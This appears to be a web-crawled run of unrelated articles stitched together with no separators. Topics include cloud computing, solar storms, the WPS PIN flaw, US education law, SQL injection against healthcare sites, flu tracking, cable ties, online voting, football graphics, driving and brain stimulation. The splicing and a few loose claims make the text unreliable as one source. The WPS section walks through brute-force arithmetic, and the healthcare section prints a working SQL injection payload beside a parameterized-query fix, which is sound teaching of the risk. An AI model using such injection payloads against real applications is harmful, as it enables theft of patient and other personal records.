Do You Need Cloud Computing?

Cloud computing, often referred to as cloud storage, is a service that allows users to access and store information on a server that is hosted over the internet. All of the storage is considered self-service, and the user is responsible for updating, downloading and managing their own storage. Rather than installing these storage solutions on a device, users can access their cloud storage online through their web browser using the provider's site. Cloud computing allows a user to perform a multitude of tasks online from any device, and all items are updated in real time.

Users likely already utilize some form of cloud service without realizing it. For example, small businesses that use QuickBooks Online are already using a form of cloud service for their bookkeeping. Cloud applications are part of the cloud computing family since they operate entirely online: the user must log in through a web browser and be connected to the internet in order to access, download and update their files.

Free Cloud Services

There are a variety of cloud computing services such as Google, Microsoft, and Amazon. These managed service providers allow users to store information, email and collaborate on files from one location, for free. Larger businesses are able to use similar services, but typically have to pay for an upgraded account to access all features and increase their storage space.

Why Should Businesses Switch to the Cloud?

Not every business user is convinced that the cloud is right for them. That said, more small business users are taking advantage of the versatility and money-saving benefits of cloud storage and cloud computing each day. Cloud storage gives smaller businesses the same data and network capabilities as larger corporations, but without the overhead costs associated with network storage and IT departments.

Small businesses are also utilizing cloud computing for their accounting and human resources software applications. Cloud services such as Smart Recruiters give small and medium-sized businesses the ability to track applications and resumes received for job postings. Freshbooks is an example of an online accounting program that gives small businesses the same accounting capabilities as big companies, but without the need to purchase multiple software licenses.

Cloud storage and cloud computing are becoming a way of life for most individuals and small businesses. Because cloud storage is generally more resilient than a single local hard drive, more private users are storing their documents, photographs and other media files on the cloud too.

By KoriLynn Johnston
The National Oceanic and Atmospheric Administration's Space Weather Prediction Center today issued a geomagnetic storm bulletin for the next 12 hours. Such storms can cause problems with Global Positioning Systems and power grids.

NOAA stated: "Great anticipation for the first of what may be three convergent shocks to slam the geomagnetic field in the next twelve hours, +/-. The CME with the Radio Blackout earlier today is by far the fastest, and may catch its forerunners in the early hours of August 5 (UTC) -- at earth. Two impacts are expected; G2 (Moderate) to G3 (Strong) Geomagnetic Storming on August 5, and potentially elevated protons to the S2 (Moderate) Solar Radiation Storm condition, those piling up ahead of the shock. The source of it all, Region 1261, is still hot, so more eruptions are possible. New Solar Cycle 24 is in its early phase now, and this level activity is typical for this time interval. Expect increased space weather activity over the next few years as the Sun erupts more frequently."

There have been a couple of solar blasts this year that have garnered lots of attention. One on Valentine's Day raised a lot of concern but didn't amount to much.

A NASA-funded study in 2009 showed some of the risks that extreme weather conditions in space pose to the Earth. The study, conducted by the National Academy of Sciences, notes that besides emitting a continuous stream of plasma called the solar wind, the sun periodically releases billions of tons of matter called coronal mass ejections. These immense clouds of material, when directed toward Earth, can cause large magnetic storms in the magnetosphere and upper atmosphere, NASA said. Such space weather can impact the performance and reliability of space-borne and ground-based technological systems, NASA said.

This year, space weather scientist Bruce Tsurutani at NASA's Jet Propulsion Laboratory stated in a paper on sunspots: "Geomagnetic effects basically amount to any magnetic changes on Earth due to the Sun, and they're measured by magnetometer readings on the surface of the Earth. Such effects are usually harmless, with the only obvious sign of their presence being the appearance of auroras near the poles. However, in extreme cases, they can cause power grid failures on Earth or induce dangerous currents in long pipelines, so it is valuable to know how the geomagnetic effects vary with the Sun."
If you are using a Wi-Fi router to provide access to your home, business or customers (such as in a coffee shop), then you need to take action to protect your network from a recently discovered security weakness. Discovered late last year (2011) by Stefan Viehböck, this vulnerability in Wi-Fi Protected Setup (WPS) affects numerous Wi-Fi devices from a range of vendors. Details of the vulnerability have been made public; in other words, hackers know about it and will, no doubt, exploit it in unprotected systems.

How Does the Wi-Fi Vulnerability Compromise Your Network?

WPS is a widely used means of easing the process of connecting to a Wi-Fi network while still maintaining security. This protocol uses an eight-digit PIN to authenticate users. If you know your basic probability/counting theory, then you can easily calculate the number of possible PINs that a hacker has to choose from: 10^8 (eight digits, each between 0 and 9 inclusive). That's 100 million (100,000,000) possibilities. The "brute force" method of attacking a WPS-protected Wi-Fi network is simply to try all the different combinations—a tedious process that can even take a computer a while to accomplish, given this number of variations. (Of course, the average brute force hack of such a network would take far fewer tries, but still somewhere near 50 million.)

In his investigation of the WPS vulnerability, however, Viehböck discovered that the protocol has design flaws that could greatly simplify a brute force attack. First, because the PIN is the only requirement for gaining access—no other means of authentication is required—brute force attacks are feasible. (If a username or some other means of identification were also required, for instance, then hacking the network would be much more complicated.) Second, the eighth digit of the WPS PIN is a checksum, which the hacker can calculate given the first seven digits. Thus, the number of unique PINs is actually 10^7 (seven digits), or 10,000,000 variations. But when performing authentication of the PIN, the access point (router) actually tells the potential client whether the first and second halves of the PIN are correct. In other words, instead of needing to find a single eight-digit PIN (actually, just a seven-digit PIN), a hacker need only find a four-digit PIN and a three-digit PIN (the second one includes the checksum). Again looking at the numbers, the problem thus reduces from finding one number among 10 million to finding two smaller numbers: one among 10^4 (10,000) possibilities and one among 10^3 (1,000) possibilities. So, a hacker who wants to break into your (unpatched) network via your WPS-enabled Wi-Fi router need only try a maximum of 11,000 times—but on average, he would need to try only about 5,500 times. This is a far cry from the average 50 million or so attempts needed to hack the router were these design flaws unrecognized.

How Long Does It Take?

The other relevant factor in brute force attacks of this kind is how long it takes to attempt authentication. Even for only about 11,000 possibilities, if a single authentication takes several minutes, then the average hack could take days or weeks—nearly an eternity, particularly when gaining access requires physical proximity. (A customer in the coffee shop sitting there for a few days straight might draw attention to himself.) Needless to say, however, most users wouldn't tolerate such a long wait—according to Viehböck, a typical authentication takes between one and three seconds.
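The arithmetic above is easy to check for yourself. The short sketch below simply recomputes the three PIN-space sizes and the rough brute-force times; it assumes 1.5 seconds per authentication attempt (the midpoint of the one-to-three-second range just quoted), and it is an illustration of the numbers, not an attack tool.

```python
# Rough WPS PIN-space arithmetic, assuming ~1.5 s per authentication attempt.

SECONDS_PER_ATTEMPT = 1.5          # assumed average, within the 1-3 s range quoted above

naive_space = 10 ** 8              # eight independent digits
checksum_space = 10 ** 7           # eighth digit is a checksum of the first seven
split_space = 10 ** 4 + 10 ** 3    # halves validated separately: 4-digit half + 3-digit half

def hours(attempts: int) -> float:
    """Convert a number of authentication attempts into hours of brute forcing."""
    return attempts * SECONDS_PER_ATTEMPT / 3600

for label, space in [("naive 8-digit", naive_space),
                     ("7 digits + checksum", checksum_space),
                     ("split halves (WPS flaw)", split_space)]:
    # Worst case tries every PIN; the average case needs about half as many tries.
    print(f"{label:25s} max {space:>11,} tries "
          f"(~{hours(space):,.1f} h worst, ~{hours(space // 2):,.1f} h average)")
```

Running it reproduces the figures in the article: about 11,000 tries at worst for the flawed split-half check, roughly 4.5 hours at 1.5 seconds per attempt, and around 2.3 hours on average.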
A smart hacker could also take some measures to reduce that duration. Assume that an authentication attempt takes 1.5 seconds. Given a maximum of 11,000 attempts, a hacker could gain access in about 4.5 hours or less—probably closer to 2 hours. A couple of hours is certainly not a length of time that would draw attention in a coffee shop, or even in many other situations. And this type of attack is not exactly sophisticated (although some knowledge is required to do it efficiently): as the name implies, it is the equivalent of knocking the door down instead of picking the lock.

Who Is Affected?

This Wi-Fi vulnerability affects essentially any router that implements WPS security. According to the United States Computer Emergency Readiness Team (US-CERT), affected vendors include Belkin, Buffalo, D-Link, Linksys (Cisco), Netgear, Technicolor, TP-Link and ZyXEL. After identifying the PIN of the access point, a hacker could then "retrieve the password for the wireless network, change the configuration of the access point, or cause a denial of service," according to the US-CERT Vulnerability Note for this weakness. In other words, a hacker could potentially cause serious damage to your network.

Thus far, some vendors have provided more of a response than others. According to US-CERT, no practical solution to the problem is yet available, although some "workarounds" can mitigate the weakness to one extent or another. Certain routers, such as those from Technicolor, provide anti-brute-force countermeasures to prevent hackers from gaining access: specifically, Technicolor states that its routers will temporarily lock out access attempts after a certain number of failed attempts (five retries). As noted in US-CERT's vendor information section for Technicolor, the vendor states that this feature keeps a brute force hack of a WPS-enabled router from succeeding in less than about a week. Other vendors have responded differently to the problem, but no real fix has yet emerged.

What You Can Do in the Meantime

If you're a consumer living in a house at the center of a 100-acre plot of land, you probably don't need to worry about your router being hacked. (Chances are, in this case, you don't even use a password.) Wi-Fi routers require a certain proximity to access the network, so by their nature, the scope of the problem is limited. Not everyone need worry about it. But if individuals not authorized to use your network (or who might abuse it) might be in range of your router, you need to act. You can bet your bottom dollar that hackers are now fully aware of the WPS vulnerability—no doubt some have already exploited it.

Possibly the most effective means of protecting your network is deactivation of WPS. Even if you think you've disabled it, however, you may not have actually done so in some cases. SmallNetBuilder.com ("Waiting For The WPS Fix") notes that Sean Gallagher (of Ars Technica) "discovered that disabling WPS on the Linksys router did not really shut it off." Oops! At this point, given that Cisco hasn't offered a fix for the problem, Linksys routers could be vulnerable regardless of any steps you might take. But there's good news (for hackers as well, unfortunately): a tool is available that allows you to test the security of your Wi-Fi router specifically with regard to this vulnerability ("Attack Tool Released for WPS PIN Vulnerability"). Beyond this action, you may have little recourse with your current router, pending further vendor action.
Future routers will likely fix the problem, but until then you may be limited in your ability to use WPS: you shouldn't use it, and if your router will not actually disable it, you should consider getting a different router. The Wi-Fi WPS vulnerability is just one more instance of how security flaws can enable hackers to harm your network, your privacy and your business. The battle will continue as hackers (or "good guys") find vulnerabilities, vendors and protocol workgroups implement countermeasures, hackers find a way around the countermeasures and so on. To protect your network and your data, you need to stay up to date on security issues.
I congratulate the House and Senate, as well as President Obama, for accomplishing what many thought impossible: a successful, bipartisan rewrite of the Elementary and Secondary Education Act. In particular, we were thrilled that the new Every Student Succeeds Act (ESSA) includes digital learning and technology professional development in its K-12 education vision. – Brian Lewis, CEO of the International Society for Technology in Education (ISTE)

The much anticipated successor to the No Child Left Behind Act (NCLB) is finally here. The Every Student Succeeds Act (ESSA) passed with overwhelming support from Congress and was signed by President Obama on December 10, 2015. ESSA includes provisions to help ensure success for students and schools, and provides state and local governments more control over the strategy for closing achievement gaps. It also includes a state grant program intended for technology use in education.

How Did This Come About?

It's important to first understand how this act came to be what it is now. A quick look back:

- The Elementary and Secondary Education Act (ESEA) was signed into law in 1965 by President Lyndon B. Johnson. It started as a civil rights law, offering grants to districts with low-income students, federal grants for books, funding for special education centers and scholarships for low-income college students.
- As an update to ESEA, NCLB was signed by President George W. Bush in early 2002.
- President Obama announced the Race to the Top program in 2009 to award competitive grants to school districts making substantial gains in student achievement. Funding of $4.35 billion was provided by the American Recovery and Reinvestment Act of 2009.
- In 2012, the Obama administration began granting flexibility to states regarding specific requirements of NCLB in exchange for comprehensive state-developed plans.
- Marking the end of the NCLB era, the House of Representatives passed ESSA on December 7. The Senate passed it on December 9, and President Obama signed it into law on December 10, 2015.

A Nod to Technology Initiatives

As mentioned, the act includes a large state block-grant program for technology use. This boost to education technology is the only other source of federal funding aside from E-rate, which provides discounts on telecommunications services and Internet access for schools. According to eSchool News, the act will make nearly $1 billion available for education technology every year for the next four years. However, states and school districts could decide to use the funding for other activities they prioritize, including projects to help students become well-rounded and stay safe and healthy. Either way, this is good news for school districts, which will now be able to update their technology infrastructure and increase their bandwidth to support important technology initiatives such as BYOD, personalized learning, blended learning and online testing.

Does ESSA Change Testing?

The main difference between ESSA and NCLB is that ESSA gives the reins back to the states and school districts to decide how to use test scores to evaluate teachers and low-performing schools. The act keeps in place the NCLB-mandated annual assessments in reading and math for students in grades 3-8. School districts will also have to test each student at least once in high school. The assessment scores will have to be separated by subgroups of students, but the schools can control how they address any achievement gaps among those groups.
Unlike NCLB, ESSA allows for the use of computer-adaptive testing in state and local assessment systems to more accurately determine student achievement. As for keeping the Common Core Standards (CCSS), ESSA says that states must adopt "challenging" academic standards, which may include CCSS, but it is not a mandate across every state. States are free to choose their own form of testing and standards, as these are no longer federally mandated by the Department of Education.

Overall, the act is believed to create a fair balance between the federal government's role in education and that of state and local governments, empowering them to use their own experiences and expertise to shape how they address student achievement and help every student succeed. Over the next few weeks, the U.S. Department of Education will work with states and districts to begin implementing the new law. For updates, visit http://www.ed.gov/essa or sign up for news about ESSA.
SecureWorks reported that attempted hacker attacks launched at its healthcare clients doubled in the fourth quarter of 2009. Attempted attacks increased from an average of 6,500 per healthcare client per day in the first nine months of 2009 to an average of 13,400 per client per day in the last three months of 2009.

In the fall of 2009, the security community began tracking a new wave of attacks involving the latest version of the Butterfly/Mariposa Bot malware. If a computer is infected with the Butterfly malware, it can be used to steal data stored by the victim's browser (including passwords), launch DDoS attacks, spread via USB devices or peer to peer, and download additional malware onto the infected computer.

SQL Injection attacks target vulnerabilities in organizations' web applications. "We also saw a resurgence of SQL Injection attacks beginning in October," said Hunter King, security researcher with SecureWorks. "They were being launched at legitimate websites so as to spread the Gumblar Trojan. Although SQL Injection is a well known attack technique, we continue to read news reports where it has been used successfully by cyber criminals to steal sensitive data," said King. One of the most recent cases reported involved American citizen Albert Gonzalez, who was charged, along with two unnamed Russians, with the theft of 130 million credit card numbers using SQL Injection.

Factors contributing to healthcare attacks:

1. Valuable data stores – Healthcare organizations often store valuable data such as a patient's Social Security number, insurance and/or financial account data, birth date, name, billing address, and phone, making them a desirable target to cyber criminals.

2. Large attack landscape – Because of the nature of their business, healthcare organizations have large attack surfaces. Healthcare entities have to provide access to many external networks and web applications so as to stay connected with their patients, employees, insurers and business partners. This increases their risk of cyber attacks.
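The article names SQL injection as the technique behind these thefts but does not show what makes a web application vulnerable to it. The snippet below is a generic illustration, not code from any incident described above: the table and column names are hypothetical, and Python's built-in sqlite3 module is used only because it needs no external dependencies.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE patients (name TEXT, ssn TEXT)")
conn.execute("INSERT INTO patients VALUES ('Alice Smith', '123-45-6789')")

user_input = "x' OR '1'='1"   # attacker-controlled value from a web form

# VULNERABLE: the input is concatenated into the SQL text, so the attacker's
# quote characters change the query's logic and dump every row.
vulnerable = f"SELECT name, ssn FROM patients WHERE name = '{user_input}'"
print(conn.execute(vulnerable).fetchall())   # leaks all records

# SAFER: a parameterized query treats the input purely as data.
safe = "SELECT name, ssn FROM patients WHERE name = ?"
print(conn.execute(safe, (user_input,)).fetchall())   # matches nothing
```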
Wikipedia traffic could be used to provide realtime tracking of flu cases, according to a study published today. John Brownstein, a professor of pediatrics at Harvard Medical School and director of Boston Children's Hospital's computational epidemiology group, along with fellow researcher David McIver, has developed an algorithm for pulling daily flu metrics from data on which flu-related terms are viewed in the online open-source encyclopedia.

Brownstein previously developed Flu Near You, which relies on users to self-report flu-like symptoms in themselves, family, and friends. But by analyzing page views for terms such as "fever," "influenza," and "Tamiflu," Brownstein and McIver created a more reliable method of estimating flu spikes.

Using online activity to monitor flu trends isn't a new idea. Google Flu Trends has used flu-related search engine queries to estimate the number of daily cases since 2008. But the algorithm failed in 2009, overestimating the peak number of cases during the H1N1 swine flu pandemic. The 2012-2013 flu season saw similar miscalculation. When compared to data from the Centers for Disease Control and Prevention on the prevalence of flu-like illnesses in the US (which is released to the public with a two-week lag), the Wikipedia model was found to be more accurate than Google's, largely because of its ability to stay on track even during sudden spikes in infection (and the accompanying panic). Perhaps, the authors suggest, hyped pandemics and particularly unpleasant flu strains cause increased Googling, including by those not ill but looking for news stories.

The researchers didn't investigate exactly why those who click through to Wikipedia are more likely suffering from the flu, or near someone who's suffering. But it stands to reason that the site can give researchers a nuanced read on how we're feeling: Wikipedia is likely to be among the top results in web searches, and as the No. 1 source of health information on the internet, those who click through to the site may be more likely to be seeking information about symptoms or medications.

In the paper, Brownstein and McIver point out that the CDC's data isn't perfect, either: it's reported by physicians, who may be more likely to log flu-like symptoms when they have heard media buzz about a possible pandemic. Indeed, it's not impossible that web-driven metrics may one day overtake the official data in both speed and accuracy.
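The study's own model isn't reproduced here, but the general idea, relating page-view counts for a handful of flu-related articles to the CDC's reported illness rate, can be sketched with a simple linear fit. Everything below is illustrative: the page-view and ILI numbers are made up, and the model is far simpler than the one Brownstein and McIver describe.

```python
import numpy as np

# Hypothetical weekly page-view counts (in thousands) for three flu-related
# Wikipedia articles, and the CDC influenza-like-illness (ILI) rate for the
# same weeks (percent of doctor visits).
views = np.array([
    # "Influenza", "Fever", "Oseltamivir (Tamiflu)"
    [120,  80, 30],
    [180, 110, 55],
    [260, 150, 90],
    [210, 130, 70],
    [140,  90, 40],
], dtype=float)
ili_rate = np.array([1.2, 2.0, 3.1, 2.5, 1.5])

# Fit ILI ~ intercept + weighted sum of page views via ordinary least squares.
X = np.hstack([np.ones((len(views), 1)), views])
coef, *_ = np.linalg.lstsq(X, ili_rate, rcond=None)

# "Nowcast" this week's flu level from today's page-view counts.
this_week = np.array([1.0, 230, 140, 80])   # 1.0 is the intercept term
print(f"estimated ILI rate: {this_week @ coef:.2f}%")
```

Because page-view counts are available daily with essentially no lag, even a crude fit like this can be refreshed long before the CDC's two-week-delayed figures arrive.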
Before the invention of nylon cable ties, early methods of keeping wiring together were far less organized. Manufacturers had to rely on friction tape, hand wrapping, lacing cords and twines. Though these seemed secure at first, adhesive tape tended to peel off once it dried, and lacing cords put the insulation of wires at risk of being cut through. There was therefore a need for better products that would not only hold wires together but also protect them from damage during use.

The inventor of the cable tie was Thomas & Betts, a company established in 1898 by two engineers, Robert Thomas and Hobart Betts, after they graduated from Princeton University. The company's aim had always been to educate end users about its products, and in this respect it was very successful. Its strategy was to generate customer pull while keeping distributors' shelves stocked with T&B products. In 1930, the company pursued this goal of mutual benefit by forming commercial partnerships with prominent dealers in order to reach its target audience.

Cable ties were first invented in 1958 by Thomas & Betts. Designed for airplane wiring harnesses, they were introduced under the brand name "Ty-Rap" and patented in the same year. The main difference from today's product was in the manufacturing: the ratchet was initially made not of nylon but of metal. The first cable ties had a steel pawl attached, and the production process was time consuming and relatively inefficient. Two separate manufacturing steps were needed (first molding the tie, then inserting the metallic pawl) to complete a single tie. The metal pawl was also vulnerable to damage, could come loose during use, and could cause damage if it fell onto a circuit.

Progress in industrial production paved the way for a refined, complete cable tie: a self-locking, two-component product. Although this new cable tie had an innovative design, fine adjustment and reduced installation time, it still required the time-consuming two-step manufacturing process. As time went on, the industry saw further development, and the self-locking nylon cable tie emerged. Later came a period of modifying the design of cable ties, and the manufacturing process was enhanced further to produce what became known as a "wire bundling device."

In 1968, a manufacturer patented a unique one-piece design and became the first to produce a one-piece nylon tie in the United States. Because this production process was much less time consuming than the earlier setup, it opened the era of the varied applications and colors of cable ties that we see today.
In the next few years, the province of Ontario, Canada, may give its citizens the choice to vote in government elections in a new way: on the Internet. Last month, Greg Essensa, Ontario's chief electoral officer, said plans to test online and telephone voting in a by-election may become a reality by 2017, which could then give 8.5 million voters an alternative to traditional voting methods. If the plan goes through, Ontario would be one of the largest jurisdictions worldwide to allow online voting, according to local media.

Online voting has already been used for general voting in municipalities outside the U.S.; however, some tech experts claim the technology isn't yet ready in terms of security and fraud prevention. In that same vein, some panelists at a 2012 Princeton University symposium claimed that many problems in online voting have not yet been solved, and that successful online voting in the U.S. is not yet realistic.

"Vendors may come and they may say they've solved the Internet voting problem for you, but I think that, by and large, they are misleading you, and misleading themselves as well," said Ron Rivest, MIT computer scientist and cryptography pioneer, during the symposium. "If they've really solved the Internet security and cybersecurity problem, what are they doing implementing voting systems? They should be working with the Department of Defense or financial industry."
Fandome offers a fascinating 3 1/2 minute video explaining how the first-down line on football broadcasts* actually works. Evidently, there's a lot of processing to calculate the exact location being photographed on the field, and a lot more to draw a line in exactly** the right place.

*In American football, a team is allotted four plays to advance the ball at least 10 yards total, where a yard is approximately 0.9 meters. If it achieves this, it is said to have gotten a "first down."

**Actually, football fans often claim that the line is off by a foot or two now and then.

- "Pan" and "tilt" are measured by optical sensors right on the camera.
- Focus and two kinds of zoom are measured by connectors to the existing digital outputs of the camera.
- This is all then encoded into a modem-like audio stream.
- It is eventually re-encoded into dots at the top of the frames in the video stream.
- That then gets to a computer, where it is processed to create the actual image of the line.
- For the line to appear to be under the players, it has to be drawn only on images of the field but not on images of the players. That's based on color filters, which are straightforward on clear, sunny days, but harder to get right in fog, snow, or mud. (A toy version of this color keying is sketched in the code below.)

Edit: A longer, several-years-old (I think) write-up makes further points:

- The system has to know the orientation of the field with respect to the camera so that it can paint the first-down line with the correct perspective from that camera's point of view.
- The system has to know, in that same perspective framework, exactly where every yard line is.
- Given that the cameraperson can move the camera, the system has to be able to sense the camera's movement (tilt, pan, zoom, focus) and understand the perspective change that results from the movement.
- Given that the camera can pan while viewing the field, the system has to be able to recalculate the perspective at a rate of 30 frames per second as the camera moves.
- A football field is not flat -- it crests very gently in the middle to help rainwater run off. So the line calculated by the system has to appropriately follow the curve of the field.
- A football game is filmed by multiple cameras at different places in the stadium, so the system has to do all of this work for several cameras.
- The system has to be able to sense when players, referees or the ball cross over the first-down line so it does not paint the line right on top of them.
- The system also has to be aware of superimposed graphics that the network might overlay on the scene.

Some of the details in that article differ from those in the video, but the general idea is the same.
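The color-keying step mentioned in the first list is the easiest piece to sketch in code. The fragment below is a toy illustration of the idea, not the broadcast system's actual algorithm: it treats any sufficiently green pixel as "field" and paints the yellow line only there, so a player standing on the line is left uncovered. The thresholds and colors are made up.

```python
import numpy as np

def paint_first_down_line(frame: np.ndarray, line_mask: np.ndarray) -> np.ndarray:
    """Overlay a yellow line on an RGB frame, but only on field-colored pixels.

    frame     -- H x W x 3 uint8 RGB image
    line_mask -- H x W bool array, True where the line should be drawn
    """
    r = frame[..., 0].astype(int)
    g = frame[..., 1].astype(int)
    b = frame[..., 2].astype(int)

    # Crude "is this grass?" test: green clearly dominates red and blue.
    # Real systems use calibrated, per-stadium color keys to cope with mud, fog and shadows.
    is_field = (g > 60) & (g > r + 20) & (g > b + 20)

    out = frame.copy()
    out[line_mask & is_field] = (255, 220, 0)   # broadcast-style yellow
    return out

# Tiny synthetic example: a green field with a darker "player" blob in the middle.
frame = np.zeros((90, 160, 3), dtype=np.uint8)
frame[...] = (30, 120, 40)            # grass
frame[30:60, 70:90] = (150, 40, 40)   # player jersey
line = np.zeros((90, 160), dtype=bool)
line[:, 80:83] = True                 # vertical first-down line
result = paint_first_down_line(frame, line)
```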
Talking on a cell phone while driving doesn't increase the risk of an accident, according to new research that looked at real-world accidents and cell-phone calls by drivers in the U.S. from 2002 to 2005. "Using a cell phone while driving may be distracting, but does not lead to higher crash risk in the setting we examined," said Saurabh Bhargava, an assistant professor at Carnegie Mellon University in Pittsburgh, and one of the two researchers in the study. The study, published in the August issue of American Economic Journal: Economic Policy was described in a report Thursday from Carnegie Mellon in Futurity, an online publication that brings research from leading universities to the public's attention. (Access to the full 33-page study article, "Driving under the (Cellular) Influence" in the economic journal costs $9.50 for 24 hours' access.) Bhargava did the research with Vikram Pathania, a fellow in the London School of Economics and Political Science. The researchers only focused on talking on a cell phone, not texting or Internet browsing, which have been highly popular in recent years. Pathania said it is possible that texting and browsing could pose a real hazard. The study used the cell-phone calling patterns of a single, unnamed wireless carrier to track an increase in call volume of 7% at 9 p.m. on weekdays when most carriers were offering free calls during the 2002 to 2005 period. Drivers were identified as those whose cell phone calls were routed through multiple cellular towers. The researchers also compared crash rates before and after 9 p.m., looking at about 8 million crashes in nine states and all the fatal crashes nationwide. The researchers found that the increase in cell phone usage had no effect on crash rates. The highest odds of a crash while using a cell phone was determined in the new study to be significantly less than that found by two researchers in 1997 who equated cell phone use by drivers to illegal levels of alcohol use. Bhargava explained the study's results saying that drivers may compensate for cell-phone use distractions by deciding to make or continue a call later or driving more carefully during a call. If drivers really do compensate for such distractions, then it makes sense for state lawmakers to penalize drivers for cell phone use as a secondary, rather than a primary, offense, he said. A secondary offense means a driver would have to be stopped first for a primary offense, such as speeding. Many studies of cell phone usage have focused on distractions in laboratory or field tests, but haven't used real world data, Bhargava noted. The National Safety Council has urged states to pass laws making cell phone usage of any kind while driving a primary offense. The council also advocates for a ban on using a cell phone for texting, talking, browsing or any other purpose while driving. The NSC believes talking on cell phones while driving leads to 20% of all crashes, while texting causes 4%. There were about 6 million car crashes in 2012 in the U.S., and 3.7 million of those resulted in significant injury or death. Most of the focus by state legislatures is on texting, with 41 states having some form of law restricting texting while driving. The CTIA, which represents the wireless industry and carriers, said it doesn't oppose total government bans on using wireless devices while behind the wheel, but said such decisions should be left to the public and lawmakers in their respective communities. 
Several years ago, the Defense Advanced Research Projects Agency got wind of a technique called transcranial direct-current stimulation, or tDCS, which promised something extraordinary: a way to increase people's performance in various capacities, from motor skills (in the case of recovering stroke patients) to language learning, all by stimulating their brains with electrical current. The simplest tDCS rigs are little more than nine-volt batteries hooked up to sponges embedded with metal and taped to a person's scalp.

It's only a short logical jump from the preceding applications to other potential uses of tDCS. What if, say, soldiers could be trained faster by hooking their heads up to a battery? This is the kind of question DARPA was created to ask. So the agency awarded a grant to researchers at the University of New Mexico to test the hypothesis. They took a virtual-reality combat-training environment called Darwars Ambush—basically, a video game the military uses to train soldiers to respond to various situations—and captured still images. Then they Photoshopped in pictures of suspicious characters and partially concealed bombs. Subjects were shown the resulting tableaus, and were asked to decide very quickly whether each scene included signs of danger.

The first round of participants did all this inside an fMRI machine, which identified roughly the parts of their brains that were working hardest as they looked for threats. Then the researchers repeated the exercise with 100 new subjects, this time sticking electrodes over the areas of the brain that had been identified in the fMRI experiment, and ran two milliamps of current (nothing dangerous) to half of the subjects as they examined the images. The remaining subjects—the control group—got only a minuscule amount of current. Under certain conditions, subjects receiving the full dose of current outperformed the others by a factor of two. And they performed especially well on tests administered an hour after training, indicating that what they'd learned was sticking. Simply put, running positive electrical current to the scalp was making people learn faster.

Dozens of other studies have turned up additional evidence that brain stimulation can improve performance on specific tasks. In some cases, the gains are small—maybe 10 or 20 percent—and in others they are large, as in the DARPA study. Vince Clark, a University of New Mexico psychology professor who was involved with the DARPA work, told me that he'd tried every data-crunching tactic he could think of to explain away the effect of tDCS. "But it's all there. It's all real," Clark said. "I keep trying to get rid of it, and it doesn't go away."

Now the intelligence-agency version of DARPA, known as IARPA, has created a program that will look at whether brain stimulation might be combined with exercise, nutrition, and games to even more dramatically enhance human performance. As Raja Parasuraman, a George Mason University psychology professor who is advising an IARPA team, puts it, "The end goal is to improve fluid intelligence—that is, to make people smarter."

Whether or not IARPA finds a way to make spies smarter, the field of brain stimulation stands to shift our understanding of the neural structures and processes that underpin intelligence. Here, based on conversations with several neuroscientists on the cutting edge of the field, are four guesses about where all this might be headed.

1. Brain stimulation will expand our understanding of the brain-mind connection.
The neural mechanisms of brain stimulation are just beginning to be understood, through work by Michael A. Nitsche and Walter Paulus at the University of Göttingen and by Marom Bikson at the City College of New York. Their findings suggest that adding current to the brain increases the plasticity of neurons, making it easier for them to form new connections. We don't imagine our brains being so mechanistic. To fix a heart with simple plumbing techniques or to reset a bone is one thing. But you're not supposed to literally flip an electrical switch and get better at spotting Waldo or learning Swahili, are you? And if flipping a switch does work, how will that affect our ideas about intelligence and selfhood?

Even if juicing the brain doesn't magically increase IQ scores, it may temporarily and substantially improve performance on certain constituent tasks of intelligence, like memory retrieval and cognitive control. This in itself will pose significant ethical challenges, some of which echo dilemmas already being raised by "neuroenhancement" drugs like Provigil. Workers doing cognitively demanding tasks—air-traffic controllers, physicists, live-radio hosts—could find themselves in the same position as cyclists, weight lifters, and baseball players. They'll either be surpassed by those willing to augment their natural abilities, or they'll have to augment themselves.

2. DIY brain stimulation will be popular—and risky.

As word of research findings has spread, do-it-yourselfers on Reddit and elsewhere have traded tips on building simple rigs and where to place electrodes for particular effects. Researchers like the Wright State neuroscientist Michael Weisend have in turn gone on DIY podcasts to warn them off. There's so much we don't know. Is neurostimulation safe over long periods of time? Will we become addicted to it? Some scientists, like Stanford's Teresa Iuculano and Oxford's Roi Cohen Kadosh, warn that cognitive enhancement through electrical stimulation may "occur at the expense of other cognitive functions." For example, when Iuculano and Kadosh applied electrical stimulation to subjects who were learning a code that paired various numbers with symbols, the test group memorized the symbols faster than the control group did. But they were slower when it came time to actually use the symbols to do arithmetic. Maybe thinking will prove to be a zero-sum game: we cannot add to our mental powers without also subtracting from them.

3. Electrical stimulation is just the beginning.

Scientists across the country are becoming interested in how other types of electromagnetic radiation might affect the brain. Some are looking at using alternating current at different frequencies, magnetic energy, ultrasound, even different types of sonic noise. There appear to be many ways of exciting the brain's circuitry with various energetic technologies, but basic research is only in its infancy. "It's so early," Clark told me. "It's very empirical now—see an effect and play with it." As we learn more about our neurons' wiring, through efforts like President Obama's BRAIN Initiative—a huge, multiagency attempt to map the brain—we may become better able to deliver energy to exactly the right spots, as opposed to bathing big portions of the brain in current or ultrasound. Early research suggests that such targeting could mean the difference between modest improvements and the startling DARPA results.
It's not hard to imagine a plethora of treatments tailored to specific types of learning, cognition, or mood—a bit of current here to boost working memory, some there to help with linguistic fluency, a dash of ultrasound to improve one's sense of well-being.

4. The most important application may be clinical treatment.

City College's Bikson worries that an emphasis on cognitive enhancement could overshadow therapies for the sick, which he sees as the more promising application of this technology. In his view, do-it-yourself tDCS is a sideshow—clinical tDCS could be used to treat people suffering from epilepsy, migraines, stroke damage, and depression. "The science and early medical trials suggest tDCS can have as large an impact as drugs and specifically treat those who have failed to respond to drugs," he told me. "tDCS researchers go to work every day knowing the long-term goal is to reduce human suffering on a transformative scale." To that end, many of them would like to see clinical trials test tDCS against leading drug therapies. "Hopefully the National Institutes of Health will do that," Parasuraman, the George Mason professor, said. "I'd like to see straightforward, side-by-side competition between tDCS and antidepressants. May the best thing win."

A Brief Chronicle of Cognitive Enhancement

500 b.c.: Ancient Greek scholars wear rosemary in their hair, believing it to boost memory.
1886: John Pemberton formulates the original Coca-Cola, with cocaine and caffeine. It's advertised as a "brain tonic."
1955: The FDA licenses methylphenidate—a.k.a. Ritalin—for treating "hyperactivity."
1997: Julie Aigner-Clark launches Baby Einstein, a line of products claiming to "facilitate the development of the brain in infants."
1998: Provigil hits the U.S. market.
2005: Lumosity, a San Francisco company devoted to online "brain training," is founded.
2020: A tDCS company starts an SAT-prep service for high-school students.
Black Box Explains... Multicasting video over a LAN: Use the right switch

